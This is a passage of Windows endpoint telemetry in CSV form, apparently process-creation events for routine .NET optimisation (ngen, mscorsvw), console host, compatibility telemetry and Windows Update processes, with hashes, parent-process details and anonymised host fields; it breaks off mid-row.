+1083,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.155766100+00:00,5640,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.143321300+00:00,2532,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:616",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.229420500+00:00,2021-06-24 01:03:58.377748500+00:00,e95815f6-1b79-4fe1-83db-2dbfc84997a0,computerpii_0a470890c60768167990033d701e7bd881398861,169884,False,10.7740.19041.1052,False,11540474045175458,,11540474045175460,2021-06-24 01:02:10.143321300+00:00,2532,2021-06-24 01:02:10.143321300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,2532,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-24 01:02:10.199206200+00:00,2021-02-17 04:29:20.504956500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1084,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.375393700+00:00,7700,ngen.exe,"""ngen.exe"" RemoveTaskDelayStartTrigger /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.143321300+00:00,2532,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:616",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.427845+00:00,2021-06-24 01:03:58.382015100+00:00,30af910c-8188-4003-b45e-fe84e736ed30,computerpii_0a470890c60768167990033d701e7bd881398861,169896,False,10.7740.19041.1052,False,11540474045175458,,11540474045175463,2021-06-24 01:02:10.143321300+00:00,2532,2021-06-24 01:02:10.143321300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,2532,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-24 01:02:10.199206200+00:00,2021-02-17 04:29:20.504956500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1085,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.431170400+00:00,6764,ngen.exe,"""ngen.exe"" RemoveTaskDelayStartTrigger /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.114937600+00:00,16480,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:660",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.522524900+00:00,2021-06-24 01:03:58.382092700+00:00,0a958e0f-a958-4337-a2fb-20c455b0db2c,computerpii_0a470890c60768167990033d701e7bd881398861,169897,False,10.7740.19041.1052,False,11540474045175457,,11540474045175464,2021-06-24 01:02:10.114937600+00:00,16480,2021-06-24 01:02:10.114937600+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,16480,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-24 01:02:10.209323600+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1086,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.471083800+00:00,18708,ngen.exe,"""ngen.exe"" ExecuteQueuedItems /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.143321300+00:00,2532,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:616",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.532030900+00:00,2021-06-24 01:03:58.382279200+00:00,3670b3ee-b68a-43f6-85fe-ca4034448408,computerpii_0a470890c60768167990033d701e7bd881398861,169898,False,10.7740.19041.1052,False,11540474045175458,,11540474045175465,2021-06-24 01:02:10.143321300+00:00,2532,2021-06-24 01:02:10.143321300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,2532,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-24 01:02:10.199206200+00:00,2021-02-17 04:29:20.504956500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1087,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.552255200+00:00,19568,ngen.exe,"""ngen.exe"" ExecuteQueuedItems /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.114937600+00:00,16480,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:660",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.650634900+00:00,2021-06-24 01:03:58.382440100+00:00,2bcd53c9-4d98-4293-a115-6c42ee2d8889,computerpii_0a470890c60768167990033d701e7bd881398861,169900,False,10.7740.19041.1052,False,11540474045175457,,11540474045175466,2021-06-24 01:02:10.114937600+00:00,16480,2021-06-24 01:02:10.114937600+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,16480,2176,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-24 01:02:10.209323600+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1088,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.563260700+00:00,16844,CompatTelRunner.exe,CompatTelRunner.exe -m:invagent.dll -f:RunUpdate -cv:F7gRRJ5BK0CAz4IT.6,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:09.746054600+00:00,11016,CompatTelRunner.exe,compattelrunner.exe -maintenance,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.652801800+00:00,2021-06-24 01:03:58.382516700+00:00,2ae73829-3e0a-4279-8eff-492d1f15d03d,computerpii_0a470890c60768167990033d701e7bd881398861,169901,False,10.7740.19041.1052,False,11540474045175439,,11540474045175467,2021-06-24 01:02:09.746054600+00:00,11016,2021-06-24 01:02:09.746054600+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,11016,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-24 00:54:21.245734700+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+1089,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.914839300+00:00,21256,ngen.exe,"""ngen.exe"" install ""System.Runtime.WindowsRuntime, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.143321300+00:00,2532,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:616",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.942893100+00:00,2021-06-24 01:03:58.382673500+00:00,0bf244fb-1ffb-4ee3-9a6d-5e6f60569ecc,computerpii_0a470890c60768167990033d701e7bd881398861,169903,False,10.7740.19041.1052,False,11540474045175458,,11540474045175468,2021-06-24 01:02:10.143321300+00:00,2532,2021-06-24 01:02:10.143321300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,2532,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-24 01:02:10.199206200+00:00,2021-02-17 04:29:20.504956500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1090,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.914942500+00:00,11236,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.114937600+00:00,16480,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:660",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.943074800+00:00,2021-06-24 01:03:58.382749500+00:00,83eeee0f-1daf-4507-92bf-05b41fcd4969,computerpii_0a470890c60768167990033d701e7bd881398861,169904,False,10.7740.19041.1052,False,11540474045175457,,11540474045175469,2021-06-24 01:02:10.114937600+00:00,16480,2021-06-24 01:02:10.114937600+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,16480,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-24 01:02:10.209323600+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1091,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.948681200+00:00,18336,mscorsvw.exe,"mscorsvw.exe -StartupEvent 1bc -InterruptEvent 0 -NGENProcess 1a8 -Pipe 1b8 -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.807523600+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe,151984,412a3fb0c25743da59375c1e298933ea,da1087ba2641efd77d85e5838aeb6c333e80caa9f24c889fd2de2e0b58f8d1a5,9b3f155d23569a683a1c1059d539a15a0c08093f,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.914839300+00:00,21256,ngen.exe,"""ngen.exe"" install ""System.Runtime.WindowsRuntime, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-24 01:02:10.143321300+00:00,2532,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.076348900+00:00,2021-06-24 01:03:58.383655100+00:00,984f10bc-9416-41b3-80a0-2f7802ee2e14,computerpii_0a470890c60768167990033d701e7bd881398861,169915,False,10.7740.19041.1052,False,11540474045175468,,11540474045175470,2021-06-24 01:02:10.914839300+00:00,21256,2021-06-24 01:02:10.914839300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,21256,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,174552,2020-12-02 20:58:16+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-24 01:02:10.408873200+00:00,2021-02-17 04:29:15.698814400+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+1092,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:11.063472800+00:00,13624,wuauclt.exe,"""wuauclt.exe"" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId dcebf50d-ef94-4e82-bad2-efed343148d4 /RunHandlerComServer",PortableExecutable,2021-04-14 01:10:16.553201900+00:00,C:\Windows\System32\wuauclt.exe,64008,970600bd493cac68a5b1efe9dbb626f9,2423ce1293c1980ee7dd4543efeb48b69634dbce875c830e7f8cd87f3c6d25b4,3f5c88006e75e1fbbd8de658d1d66aeac432de75,fd33757fa1522b4555e8d8d61bd18a07,6d17958c6527346036f35c6d9db2f5c8d820cbfbd043588304c7beddf7ea8641,9a4803b5c0e1a33396a4c816dbe57369241f419c,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:48:10.634688500+00:00,13224,MoUsoCoreWorker.exe,mousocoreworker.exe -Embedding,True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.083388300+00:00,2021-06-24 01:03:58.383731300+00:00,c5795694-2281-40dc-99b6-3ebe3ba035c3,computerpii_0a470890c60768167990033d701e7bd881398861,169916,False,10.7740.19041.1052,False,11540474045137196,,11540474045175471,2021-06-10 00:48:10.634688500+00:00,13224,2021-06-10 00:48:10.634688500+00:00,\Device\HarddiskVolume3\Windows\System32\MoUsoCoreWorker.exe,13224,128,ActiveProcessStartkey,C:\Windows\System32,1553408,1990-07-31 23:15:30+00:00,2021-06-09 01:20:44.588993100+00:00,2021-06-10 00:48:10.654901200+00:00,2021-06-09 01:20:44.551541700+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,MoUSO Core Worker Process,MoUSOCoreWorker.exe,MoUSO Core Worker Process,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,wuauclt.exe,wuauclt.exe,Windows Update
+1093,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:11.063690100+00:00,7880,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.143321300+00:00,2532,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:616",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.083527100+00:00,2021-06-24 01:03:58.383808700+00:00,0d7c11ce-0fd1-44af-9f3b-183c15457c31,computerpii_0a470890c60768167990033d701e7bd881398861,169917,False,10.7740.19041.1052,False,11540474045175458,,11540474045175472,2021-06-24 01:02:10.143321300+00:00,2532,2021-06-24 01:02:10.143321300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,2532,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-24 01:02:10.199206200+00:00,2021-02-17 04:29:20.504956500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1094,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:11.094377+00:00,18448,mscorsvw.exe,"mscorsvw.exe -StartupEvent 1b0 -InterruptEvent 0 -NGENProcess 1b8 -Pipe 1a8 -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.807523600+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe,151984,412a3fb0c25743da59375c1e298933ea,da1087ba2641efd77d85e5838aeb6c333e80caa9f24c889fd2de2e0b58f8d1a5,9b3f155d23569a683a1c1059d539a15a0c08093f,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:11.063690100+00:00,7880,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-24 01:02:10.143321300+00:00,2532,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:11.180387400+00:00,2021-06-24 01:03:58.384448400+00:00,76ece2ca-f4cc-4895-8c22-57ed76b6bd06,computerpii_0a470890c60768167990033d701e7bd881398861,169925,False,10.7740.19041.1052,False,11540474045175472,,11540474045175473,2021-06-24 01:02:11.063690100+00:00,7880,2021-06-24 01:02:11.063690100+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,7880,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,174552,2020-12-02 20:58:16+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-24 01:02:10.408873200+00:00,2021-02-17 04:29:15.698814400+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+1095,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:11.174688100+00:00,17740,mscorsvw.exe,"mscorsvw.exe -StartupEvent 210 -InterruptEvent 0 -NGENProcess 1fc -Pipe 20c -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.864371200+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe,125872,d7365b80e8951ddc95f3a8e3ac01d37d,3e5099f573601926e59862fba2495974688e72677c73f10e4c99e26a76cdcf37,0636347981cb05b74859ce7c841753da90ce679a,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.914942500+00:00,11236,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-24 